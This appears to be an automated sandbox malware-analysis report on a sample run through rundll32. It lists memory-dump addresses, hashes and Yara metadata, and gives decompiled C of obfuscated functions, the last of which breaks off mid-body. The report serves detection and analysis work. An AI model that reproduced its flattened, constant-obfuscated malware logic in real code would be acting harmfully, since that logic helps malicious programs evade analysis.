                                                                      0x02006c42
                                                                      0x02006c4a
                                                                      0x02006c4f
                                                                      0x02006c57
                                                                      0x02006c5f
                                                                      0x02006c67
                                                                      0x02006c6f
                                                                      0x02006c77
                                                                      0x02006c7f
                                                                      0x02006c84
                                                                      0x02006c8c
                                                                      0x02006c94
                                                                      0x02006c9c
                                                                      0x02006ca0
                                                                      0x02006ca8
                                                                      0x02006cb5
                                                                      0x02006cc2
                                                                      0x02006cc7
                                                                      0x02006cc8
                                                                      0x02006ccc
                                                                      0x02006cd0
                                                                      0x02006cd8
                                                                      0x02006ce0
                                                                      0x02006ce8
                                                                      0x02006ced
                                                                      0x02006cf5
                                                                      0x02006cfd
                                                                      0x02006d05
                                                                      0x02006d0d
                                                                      0x02006d15
                                                                      0x02006d1a
                                                                      0x02006d22
                                                                      0x02006d2a
                                                                      0x02006d32
                                                                      0x02006d3f
                                                                      0x02006d43
                                                                      0x02006d4b
                                                                      0x02006d59
                                                                      0x02006d62
                                                                      0x02006d66
                                                                      0x02006d6e
                                                                      0x02006d76
                                                                      0x02006d7e
                                                                      0x02006d83
                                                                      0x02006d8b
                                                                      0x02006d93
                                                                      0x02006d9b
                                                                      0x02006da0
                                                                      0x02006da8
                                                                      0x02006db0
                                                                      0x02006db5
                                                                      0x02006dbd
                                                                      0x02006dca
                                                                      0x02006dce
                                                                      0x02006dd6
                                                                      0x02006dde
                                                                      0x02006de3
                                                                      0x02006ded
                                                                      0x02006dfb
                                                                      0x02006dfe
                                                                      0x02006e07
                                                                      0x02006e0b
                                                                      0x02006e13
                                                                      0x02006e1b
                                                                      0x02006e20
                                                                      0x02006e25
                                                                      0x02006e2a
                                                                      0x02006e32
                                                                      0x02006e3a
                                                                      0x02006e42
                                                                      0x02006e47
                                                                      0x02006e4f
                                                                      0x02006e57
                                                                      0x02006e5c
                                                                      0x02006e61
                                                                      0x02006e69
                                                                      0x02006e71
                                                                      0x02006e76
                                                                      0x02006e7b
                                                                      0x02006e83
                                                                      0x02006e8b
                                                                      0x02006e90
                                                                      0x02006e98
                                                                      0x02006ea0
                                                                      0x02006ea8
                                                                      0x02006eb0
                                                                      0x02006eb8
                                                                      0x02006ec0
                                                                      0x02006ec8
                                                                      0x02006ed0
                                                                      0x02006ed8
                                                                      0x02006ee0
                                                                      0x02006ee8
                                                                      0x02006eed
                                                                      0x02006ef2
                                                                      0x02006efa
                                                                      0x02006f02
                                                                      0x02006f07
                                                                      0x02006f0f
                                                                      0x02006f17
                                                                      0x02006f1f
                                                                      0x02006f27
                                                                      0x02006f2f
                                                                      0x02006f33
                                                                      0x02006f45
                                                                      0x02007074
                                                                      0x02007075
                                                                      0x0200707c
                                                                      0x02007086
                                                                      0x02007089
                                                                      0x02007060
                                                                      0x02007060
                                                                      0x02006f8b
                                                                      0x02006f8d
                                                                      0x00000000
                                                                      0x02006f8d
                                                                      0x02006f51
                                                                      0x02006f90
                                                                      0x02006fb1
                                                                      0x02006fb6
                                                                      0x02006fbb
                                                                      0x02006fbf
                                                                      0x0200700e
                                                                      0x02007023
                                                                      0x02007031
                                                                      0x02007032
                                                                      0x02007033
                                                                      0x02007037
                                                                      0x0200703b
                                                                      0x0200703f
                                                                      0x0200704a
                                                                      0x0200704b
                                                                      0x0200704c
                                                                      0x02007051
                                                                      0x02007058
                                                                      0x0200705a
                                                                      0x0200705a
                                                                      0x00000000
                                                                      0x0200705a
                                                                      0x02006f59
                                                                      0x00000000
                                                                      0x020070c3
                                                                      0x02006f65
                                                                      0x020070a6
                                                                      0x020070a6
                                                                      0x020070ac
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020070ce
                                                                      0x020070ce
                                                                      0x020070ce
                                                                      0x02006f75
                                                                      0x02006f76
                                                                      0x02006f7b
                                                                      0x02006f80
                                                                      0x02006f86
                                                                      0x00000000
                                                                      0x02006f86
                                                                      0x00000000
                                                                      0x02006f80
                                                                      0x02007091
                                                                      0x02007094
                                                                      0x0200709e
                                                                      0x020070a0
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
                                                                      • API String ID: 0-1292055276
                                                                      • Opcode ID: 58e62d4f04a5a3e9ff4557222e72bf4488030016b1e1191806747f2306f669db
                                                                      • Instruction ID: 24269de30635efd03f6eb3de9924c2187159abaf21d31e55c173ad5a7e5d4e70
                                                                      • Opcode Fuzzy Hash: 58e62d4f04a5a3e9ff4557222e72bf4488030016b1e1191806747f2306f669db
                                                                      • Instruction Fuzzy Hash: 17C112724083809FE369CF65C98995FFBF1BB84748F504A1DF1A5962A0D7BA9908CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00246158, Relevance: 11.5, Strings: 9, Instructions: 244COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #Q$.=C$:Q$Sq$W}$\$l${V$5I[
                                                                      • API String ID: 0-1292055276
                                                                      • Opcode ID: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
                                                                      • Instruction ID: a4712450b43bc4f47edf83d080b4ef7137923642f538b1fd60409dbffc063410
                                                                      • Opcode Fuzzy Hash: 27dfc40b911172738d26ce027ea30d5c4c5eb83b91f10e379745cced135b0954
                                                                      • Instruction Fuzzy Hash: 12C112724083809FE369CF65C58954BFBF1BB85748F504A1DF1A6962A0D7B98918CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200C6D9, Relevance: 10.3, Strings: 8, Instructions: 297COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E0200C6D9(intOrPtr* __edx, intOrPtr _a4) {
				signed int _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* __ecx;
				void* _t252;
				void* _t281;
				intOrPtr _t284;
				void* _t289;
				void* _t293;
				short _t294;
				signed int _t295;
				signed int _t296;
				void* _t298;
				intOrPtr* _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t357;
				signed int* _t359;
				void* _t361;

				_push(_a4);
				_t340 = __edx;
				_push(__edx);
				_v8 = __edx;
				E02002550(_t252);
				_v12 = _v12 & 0x00000000;
				_t359 =  &(( &_v104)[3]);
				_v36 = 0x3d9b;
				_v36 = _v36 + 0x87e4;
				_t298 = 0xa757dfd;
				_v36 = _v36 ^ 0x00003896;
				_v16 = 0xa1a2;
				_t344 = 0x7e;
				_v16 = _v16 / _t344;
				_v16 = _v16 ^ 0x00005f0b;
				_v20 = 0xd4a;
				_v20 = _v20 ^ 0x823c7950;
				_v20 = _v20 ^ 0x823c4fb0;
				_v80 = 0x8dd3;
				_v80 = _v80 + 0xffff84c4;
				_t345 = 0x3a;
				_v80 = _v80 / _t345;
				_t346 = 0xf;
				_v80 = _v80 / _t346;
				_v80 = _v80 ^ 0x00002598;
				_v84 = 0x28b2;
				_v84 = _v84 ^ 0xae38f700;
				_t347 = 0x16;
				_v84 = _v84 * 0x2b;
				_v84 = _v84 >> 4;
				_v84 = _v84 ^ 0x0438ce96;
				_v100 = 0xb16b;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x3a2fdb23;
				_v100 = _v100 / _t347;
				_v100 = _v100 ^ 0x02a4abe7;
				_v32 = 0x883d;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00442a4b;
				_v92 = 0xca89;
				_v92 = _v92 << 0xe;
				_v92 = _v92 + 0x8a44;
				_t348 = 0x29;
				_v92 = _v92 / _t348;
				_v92 = _v92 ^ 0x013c4aa7;
				_v52 = 0x404;
				_t349 = 0x6a;
				_v52 = _v52 / _t349;
				_v52 = _v52 + 0xffff84cc;
				_v52 = _v52 ^ 0xffffb1d7;
				_v96 = 0x1382;
				_v96 = _v96 ^ 0xdda77c38;
				_v96 = _v96 << 2;
				_t350 = 0x21;
				_v96 = _v96 / _t350;
				_v96 = _v96 ^ 0x03984523;
				_v28 = 0x72c9;
				_v28 = _v28 + 0xc1ec;
				_v28 = _v28 ^ 0x000116d9;
				_v88 = 0xe360;
				_v88 = _v88 << 1;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0xffffdc99;
				_v88 = _v88 ^ 0x00002bb3;
				_v24 = 0xb27;
				_v24 = _v24 | 0x54af4a27;
				_v24 = _v24 ^ 0x54af70c5;
				_v104 = 0x20e9;
				_v104 = _v104 ^ 0x30957c1a;
				_v104 = _v104 >> 1;
				_v104 = _v104 >> 0xa;
				_v104 = _v104 ^ 0x000644e5;
				_v60 = 0x5e02;
				_v60 = _v60 << 0xc;
				_t351 = 0x6b;
				_t295 = _v4;
				_t357 = _v4;
				_v60 = _v60 * 0x29;
				_v60 = _v60 ^ 0xf0e520c4;
				_v64 = 0x8dff;
				_v64 = _v64 * 0x38;
				_v64 = _v64 + 0x458e;
				_v64 = _v64 ^ 0x001f749b;
				_v40 = 0x5c65;
				_v40 = _v40 / _t351;
				_v40 = _v40 ^ 0x00006d1c;
				_v72 = 0xc60a;
				_v72 = _v72 + 0x70bb;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x026de662;
				_v76 = 0x47c;
				_v76 = _v76 + 0xffff5521;
				_v76 = _v76 ^ 0xd2a60678;
				_t352 = 0x14;
				_t353 = _v4;
				_v76 = _v76 / _t352;
				_v76 = _v76 ^ 0x02446ded;
				_v44 = 0xfc2b;
				_v44 = _v44 + 0x96d4;
				_v44 = _v44 ^ 0x17589983;
				_v44 = _v44 ^ 0x17594bcd;
				_v48 = 0xed74;
				_v48 = _v48 + 0x9236;
				_v48 = _v48 ^ 0x53004543;
				_v48 = _v48 ^ 0x53013ae9;
				_v56 = 0x1029;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x46c265d9;
				_v56 = _v56 ^ 0x46d24cd9;
				_v68 = 0xb47b;
				_v68 = _v68 + 0x930f;
				_v68 = _v68 | 0xf81d1365;
				_v68 = _v68 ^ 0xf81d57ef;
				while(1) {
					while(1) {
						L2:
						_t361 = _t298 - 0x16ae89bd;
						if(_t361 <= 0) {
							break;
						}
						if(_t298 == 0x1dc5383f) {
							E01FF2DDF(_v16,  &_v12, _v20, E02009B4A);
							_t298 = 0x3a204f2b;
							goto L25;
						} else {
							if(_t298 == 0x3a204f2b) {
								_t353 = _v48;
								_t342 = _v12;
								_v4 = _t353;
								if(_t342 != 0) {
									do {
										_t289 = E0200232B(_v80, _t342 + 0x1c, _v84);
										_t342 =  *((intOrPtr*)(_t342 + 8));
										_t353 = _t353 + 1 + _t289;
									} while (_t342 != 0);
									_v4 = _t353;
									_t281 = 0x3afc2fec;
								}
								_t298 = 0x16ae89bd;
								goto L19;
							} else {
								if(_t298 != _t281) {
									L25:
									if(_t298 != 0x1813df8a) {
										continue;
									} else {
									}
								} else {
									_t295 = _v56;
									_t343 = _v12;
									if(_t343 != 0) {
										do {
											_t221 =  &_v28; // 0x442a4b
											E020003F1(_v92, _v52, _t343 + 0x1c, _t295 * 2 + _t357, _v96,  *_t221);
											_t293 = E0200232B(_v88, _t343 + 0x1c, _v24);
											_t359 =  &(_t359[5]);
											_t296 = _t295 + _t293;
											_t294 = 0x2c;
											 *((short*)(_t357 + _t296 * 2)) = _t294;
											_t295 = _t296 + 1;
											_t343 =  *((intOrPtr*)(_t343 + 8));
										} while (_t343 != 0);
										_t281 = 0x3afc2fec;
									}
									_t353 = _v4;
									_t298 = 0x18c8122;
									L19:
									_t340 = _v8;
									continue;
								}
							}
						}
						L30:
						return 0 |  *_t340 != 0x00000000;
					}
					if(_t361 == 0) {
						_push(_t298);
						_t357 = E01FF54FB(_t353 + _t353);
						_t281 = 0x3afc2fec;
						_t298 =  !=  ? 0x3afc2fec : 0x3fa0ed8;
						goto L2;
					} else {
						if(_t298 == 0x18c8122) {
							 *(_t340 + 4) = _v68;
							_t284 = E01FF7731(_t357, _t340 + 4, _v36, _v104, _v60, _v64, _t295 - 1);
							_t359 =  &(_t359[5]);
							 *_t340 = _t284;
							_t298 = 0xfb62ecd;
							continue;
						} else {
							if(_t298 == 0x3fa0ed8) {
								_t341 = _v12;
								if(_t341 != 0) {
									do {
										_t354 =  *(_t341 + 8);
										E01FFDE81(_v76, _t341, _v44);
										_t341 = _t354;
									} while (_t354 != 0);
								}
								_t340 = _v8;
							} else {
								if(_t298 == 0xa757dfd) {
									_t298 = 0x1dc5383f;
									goto L2;
								} else {
									if(_t298 != 0xfb62ecd) {
										goto L25;
									} else {
										E01FFDE81(_v40, _t357, _v72);
										_t298 = 0x3fa0ed8;
										while(1) {
											goto L2;
										}
									}
								}
							}
						}
					}
					goto L30;
				}
			}

























































                                                                      0x0200c6e0
                                                                      0x0200c6e4
                                                                      0x0200c6e6
                                                                      0x0200c6e8
                                                                      0x0200c6ec
                                                                      0x0200c6f1
                                                                      0x0200c6f6
                                                                      0x0200c6f9
                                                                      0x0200c703
                                                                      0x0200c70b
                                                                      0x0200c710
                                                                      0x0200c718
                                                                      0x0200c726
                                                                      0x0200c72b
                                                                      0x0200c731
                                                                      0x0200c739
                                                                      0x0200c741
                                                                      0x0200c749
                                                                      0x0200c751
                                                                      0x0200c759
                                                                      0x0200c765
                                                                      0x0200c76a
                                                                      0x0200c774
                                                                      0x0200c779
                                                                      0x0200c77f
                                                                      0x0200c787
                                                                      0x0200c78f
                                                                      0x0200c79c
                                                                      0x0200c79f
                                                                      0x0200c7a3
                                                                      0x0200c7a8
                                                                      0x0200c7b0
                                                                      0x0200c7b8
                                                                      0x0200c7bd
                                                                      0x0200c7cd
                                                                      0x0200c7d1
                                                                      0x0200c7d9
                                                                      0x0200c7e1
                                                                      0x0200c7e6
                                                                      0x0200c7ee
                                                                      0x0200c7f6
                                                                      0x0200c7fb
                                                                      0x0200c807
                                                                      0x0200c80c
                                                                      0x0200c812
                                                                      0x0200c81a
                                                                      0x0200c826
                                                                      0x0200c829
                                                                      0x0200c82d
                                                                      0x0200c835
                                                                      0x0200c83d
                                                                      0x0200c845
                                                                      0x0200c84f
                                                                      0x0200c85a
                                                                      0x0200c85f
                                                                      0x0200c865
                                                                      0x0200c86d
                                                                      0x0200c875
                                                                      0x0200c87d
                                                                      0x0200c885
                                                                      0x0200c88d
                                                                      0x0200c891
                                                                      0x0200c896
                                                                      0x0200c89e
                                                                      0x0200c8a6
                                                                      0x0200c8ae
                                                                      0x0200c8b6
                                                                      0x0200c8be
                                                                      0x0200c8c6
                                                                      0x0200c8ce
                                                                      0x0200c8d2
                                                                      0x0200c8d7
                                                                      0x0200c8df
                                                                      0x0200c8e7
                                                                      0x0200c8f1
                                                                      0x0200c8f4
                                                                      0x0200c8f8
                                                                      0x0200c8fc
                                                                      0x0200c900
                                                                      0x0200c908
                                                                      0x0200c915
                                                                      0x0200c919
                                                                      0x0200c921
                                                                      0x0200c929
                                                                      0x0200c939
                                                                      0x0200c93d
                                                                      0x0200c945
                                                                      0x0200c94d
                                                                      0x0200c955
                                                                      0x0200c95a
                                                                      0x0200c962
                                                                      0x0200c96a
                                                                      0x0200c972
                                                                      0x0200c97e
                                                                      0x0200c981
                                                                      0x0200c985
                                                                      0x0200c989
                                                                      0x0200c991
                                                                      0x0200c999
                                                                      0x0200c9a1
                                                                      0x0200c9a9
                                                                      0x0200c9b1
                                                                      0x0200c9b9
                                                                      0x0200c9c1
                                                                      0x0200c9c9
                                                                      0x0200c9d1
                                                                      0x0200c9d9
                                                                      0x0200c9de
                                                                      0x0200c9e6
                                                                      0x0200c9ee
                                                                      0x0200c9f6
                                                                      0x0200c9fe
                                                                      0x0200ca06
                                                                      0x0200ca0e
                                                                      0x0200ca13
                                                                      0x0200ca13
                                                                      0x0200ca13
                                                                      0x0200ca19
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200cac8
                                                                      0x0200cb94
                                                                      0x0200cb9b
                                                                      0x00000000
                                                                      0x0200cace
                                                                      0x0200cad4
                                                                      0x0200cb48
                                                                      0x0200cb4c
                                                                      0x0200cb50
                                                                      0x0200cb56
                                                                      0x0200cb58
                                                                      0x0200cb63
                                                                      0x0200cb68
                                                                      0x0200cb6c
                                                                      0x0200cb6f
                                                                      0x0200cb73
                                                                      0x0200cb77
                                                                      0x0200cb77
                                                                      0x0200cb7c
                                                                      0x00000000
                                                                      0x0200cad6
                                                                      0x0200cad8
                                                                      0x0200cba5
                                                                      0x0200cbab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0200cbb1
                                                                      0x0200cade
                                                                      0x0200cade
                                                                      0x0200cae2
                                                                      0x0200cae8
                                                                      0x0200caea
                                                                      0x0200caea
                                                                      0x0200cb08
                                                                      0x0200cb17
                                                                      0x0200cb1c
                                                                      0x0200cb1f
                                                                      0x0200cb23
                                                                      0x0200cb24
                                                                      0x0200cb29
                                                                      0x0200cb2a
                                                                      0x0200cb2d
                                                                      0x0200cb31
                                                                      0x0200cb31
                                                                      0x0200cb36
                                                                      0x0200cb3a
                                                                      0x0200cb3f
                                                                      0x0200cb3f
                                                                      0x00000000
                                                                      0x0200cb3f
                                                                      0x0200cad8
                                                                      0x0200cad4
                                                                      0x0200cbd8
                                                                      0x0200cbe6
                                                                      0x0200cbe6
                                                                      0x0200ca1f
                                                                      0x0200caa5
                                                                      0x0200caab
                                                                      0x0200caad
                                                                      0x0200caba
                                                                      0x00000000
                                                                      0x0200ca21
                                                                      0x0200ca27
                                                                      0x0200ca6e
                                                                      0x0200ca86
                                                                      0x0200ca8b
                                                                      0x0200ca8e
                                                                      0x0200ca90
                                                                      0x00000000
                                                                      0x0200ca29
                                                                      0x0200ca2f
                                                                      0x0200cbb3
                                                                      0x0200cbb9
                                                                      0x0200cbbb
                                                                      0x0200cbc5
                                                                      0x0200cbc8
                                                                      0x0200cbcd
                                                                      0x0200cbd0
                                                                      0x0200cbbb
                                                                      0x0200cbd4
                                                                      0x0200ca35
                                                                      0x0200ca3b
                                                                      0x0200ca60
                                                                      0x00000000
                                                                      0x0200ca3d
                                                                      0x0200ca43
                                                                      0x00000000
                                                                      0x0200ca49
                                                                      0x0200ca53
                                                                      0x0200ca59
                                                                      0x0200ca0e
                                                                      0x00000000
                                                                      0x0200ca0e
                                                                      0x0200ca0e
                                                                      0x0200ca43
                                                                      0x0200ca3b
                                                                      0x0200ca2f
                                                                      0x0200ca27
                                                                      0x00000000
                                                                      0x0200ca1f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +O :$+O :$CE$J$K*D$`$e\$
                                                                      • API String ID: 0-1729304812
                                                                      • Opcode ID: 4de23f791581169294c9b4e33f21d45d106f6a5682f51ce4f228391888106c7d
                                                                      • Instruction ID: ca5d0da37b4b2b1d4e277c404bc98f46a55c0e12808426c0ce397e0088345e41
                                                                      • Opcode Fuzzy Hash: 4de23f791581169294c9b4e33f21d45d106f6a5682f51ce4f228391888106c7d
                                                                      • Instruction Fuzzy Hash: 1FD152715083419FE369CF26C48951BBBF2FBC4758F108A0EF696962A0D7B5C949CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024BC4D, Relevance: 10.3, Strings: 8, Instructions: 297COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +O :$+O :$CE$J$K*D$`$e\$
                                                                      • API String ID: 0-1729304812
                                                                      • Opcode ID: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
                                                                      • Instruction ID: b0d58ed9640e3d2d4a86663310a8ca4db3be502746f51f415775e6ab2f156ca4
                                                                      • Opcode Fuzzy Hash: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
                                                                      • Instruction Fuzzy Hash: CDD163711183419FD358CF29C88951BBBE2FBC4718F208A0EF596972A0DBB5D959CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFC364, Relevance: 10.3, Strings: 8, Instructions: 290COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E01FFC364() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				unsigned int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _t323;
				short* _t338;
				void* _t343;
				signed int _t347;
				void* _t349;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int* _t398;

				_t398 =  &_v1160;
				_v1044 = 0xb4bf;
				_t349 = 0x14e1bd3d;
				_t347 = 0x32;
				_v1044 = _v1044 / _t347;
				_v1044 = _v1044 ^ 0x000063a2;
				_v1120 = 0x1c18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xbedc4282;
				_v1120 = _v1120 ^ 0xbedc611c;
				_v1096 = 0xe102;
				_v1096 = _v1096 | 0x1f52717c;
				_v1096 = _v1096 + 0x31d9;
				_v1096 = _v1096 ^ 0x1f532ca5;
				_v1112 = 0x173b;
				_t389 = 0x5f;
				_v1112 = _v1112 / _t389;
				_v1112 = _v1112 | 0xb3fa1704;
				_v1112 = _v1112 ^ 0xb3fa37e7;
				_v1068 = 0x9869;
				_t387 = 0x69;
				_t390 = 0x53;
				_v1068 = _v1068 * 0x43;
				_v1068 = _v1068 ^ 0x0027b996;
				_v1084 = 0xcfb9;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 + 0x12c;
				_v1084 = _v1084 ^ 0x000024ff;
				_v1128 = 0x3cd5;
				_v1128 = _v1128 | 0x566ade8e;
				_v1128 = _v1128 >> 9;
				_v1128 = _v1128 + 0xffff5a4b;
				_v1128 = _v1128 ^ 0x002ae40f;
				_v1104 = 0x6c2b;
				_v1104 = _v1104 | 0x9ff8dffb;
				_v1104 = _v1104 ^ 0x9ff8a878;
				_v1056 = 0xffd2;
				_v1056 = _v1056 + 0xffff840f;
				_v1056 = _v1056 ^ 0x0000ebeb;
				_v1152 = 0x1736;
				_v1152 = _v1152 | 0x4cb32822;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0xb8cf;
				_v1152 = _v1152 ^ 0x00bbe158;
				_v1080 = 0x5ef;
				_v1080 = _v1080 + 0xffff8539;
				_v1080 = _v1080 / _t390;
				_v1080 = _v1080 ^ 0x0315a6d4;
				_v1048 = 0xf210;
				_v1048 = _v1048 | 0xcb23d8d0;
				_v1048 = _v1048 ^ 0xcb23a87f;
				_v1144 = 0x90;
				_t391 = 0x31;
				_v1144 = _v1144 / _t391;
				_v1144 = _v1144 + 0xffff80e0;
				_t392 = 0x67;
				_v1144 = _v1144 / _t392;
				_v1144 = _v1144 ^ 0x027c3ad8;
				_v1072 = 0xc5ae;
				_t393 = 0x16;
				_v1072 = _v1072 / _t393;
				_t394 = 0x60;
				_v1072 = _v1072 / _t394;
				_v1072 = _v1072 ^ 0x00006ed7;
				_v1136 = 0xa4ba;
				_v1136 = _v1136 ^ 0xe75bfca7;
				_t395 = 0x7b;
				_v1136 = _v1136 * 0x5c;
				_v1136 = _v1136 ^ 0xe80995ee;
				_v1136 = _v1136 ^ 0xccda384c;
				_v1156 = 0x7c9c;
				_v1156 = _v1156 + 0xffffb410;
				_v1156 = _v1156 + 0xfffffa49;
				_v1156 = _v1156 >> 8;
				_v1156 = _v1156 ^ 0x000056b1;
				_v1160 = 0x84ff;
				_v1160 = _v1160 ^ 0xed45694c;
				_t148 =  &_v1160; // 0xed45694c
				_v1160 =  *_t148 * 0x62;
				_v1160 = _v1160 + 0xffff41d7;
				_v1160 = _v1160 ^ 0xd4c40e06;
				_v1092 = 0x1d87;
				_v1092 = _v1092 << 8;
				_v1092 = _v1092 ^ 0x7d24d215;
				_v1092 = _v1092 ^ 0x7d392b35;
				_v1060 = 0x93f7;
				_v1060 = _v1060 + 0xffff7474;
				_v1060 = _v1060 ^ 0x00001886;
				_v1064 = 0xef31;
				_v1064 = _v1064 >> 0x10;
				_v1064 = _v1064 ^ 0x000047fd;
				_v1148 = 0x11a7;
				_v1148 = _v1148 | 0x5b5dfd11;
				_v1148 = _v1148 << 6;
				_v1148 = _v1148 + 0xffff2c3e;
				_v1148 = _v1148 ^ 0xd77ed371;
				_v1100 = 0x7077;
				_v1100 = _v1100 / _t387;
				_v1100 = _v1100 | 0x4c8a3f77;
				_v1100 = _v1100 ^ 0x4c8a3283;
				_v1140 = 0x668c;
				_v1140 = _v1140 | 0x54be0880;
				_v1140 = _v1140 + 0xd8b3;
				_v1140 = _v1140 / _t395;
				_v1140 = _v1140 ^ 0x00b05f67;
				_v1076 = 0x11c3;
				_v1076 = _v1076 >> 6;
				_v1076 = _v1076 ^ 0x5bd60e39;
				_v1076 = _v1076 ^ 0x5bd63952;
				_v1124 = 0x5174;
				_v1124 = _v1124 * 0x1a;
				_v1124 = _v1124 + 0xffff3f27;
				_t323 = _v1124;
				_t381 = _t323 % _t347;
				_v1124 = _t323 / _t347;
				_v1124 = _v1124 ^ 0x00007b90;
				_v1132 = 0x9c48;
				_v1132 = _v1132 << 2;
				_v1132 = _v1132 ^ 0x5e61e8c2;
				_v1132 = _v1132 ^ 0xca6ca211;
				_v1132 = _v1132 ^ 0x940f5e6e;
				_v1052 = 0xbbfe;
				_v1052 = _v1052 >> 0xc;
				_v1052 = _v1052 ^ 0x00003fa7;
				_v1108 = 0xdf34;
				_v1108 = _v1108 * 0x2f;
				_v1108 = _v1108 + 0xffff7f6f;
				_v1108 = _v1108 ^ 0x0028118b;
				_v1116 = 0x2c66;
				_v1116 = _v1116 >> 2;
				_v1116 = _v1116 ^ 0x28bea5fc;
				_v1116 = _v1116 ^ 0x28beb247;
				_v1088 = 0x89d3;
				_v1088 = _v1088 >> 2;
				_v1088 = _v1088 + 0xa943;
				_v1088 = _v1088 ^ 0x0000f687;
				do {
					while(_t349 != 0x14e1bd3d) {
						if(_t349 == 0x1c504520) {
							E01FF3B74();
							L9:
							_t349 = 0x363d246c;
							continue;
						}
						if(_t349 == 0x1e34bac7) {
							E01FFF4A2(_v1156, _t381, _v1160, _v1092,  &_v1040);
							_push( &_v1040);
							E01FF7571( &_v1040);
							_t381 = _v1100;
							E0200CBE7( &_v520, _v1100, __eflags, _v1140, _v1076,  &_v1040);
							_t398 =  &(_t398[2]) - 0xc + 0x20;
							_t349 = 0x2b0461c4;
							continue;
						}
						if(_t349 == 0x2b0461c4) {
							_t338 = E01FFBDCC( &_v520, _v1124, _v1132, _v1052);
							__eflags = 0;
							 *_t338 = 0;
							_t298 =  &_v1108; // 0x7d392b35
							return E02005183( *_t298, _v1116, _v1088,  &_v520);
						}
						if(_t349 == 0x35103033) {
							_t343 = E0200434E();
							goto L9;
						}
						_t408 = _t349 - 0x363d246c;
						if(_t349 != 0x363d246c) {
							goto L15;
						}
						_push(0x1ff12d8);
						_push(_v1128);
						_push(_v1084);
						E01FFA4D7(_t408, _v1056, _v1152, _v1080, _v1048, E01FF5DFC(_v1112, _v1068, _t408),  *0x2011088 + 0x254,  &_v520,  *0x2011088 + 0x38);
						_t381 = _v1072;
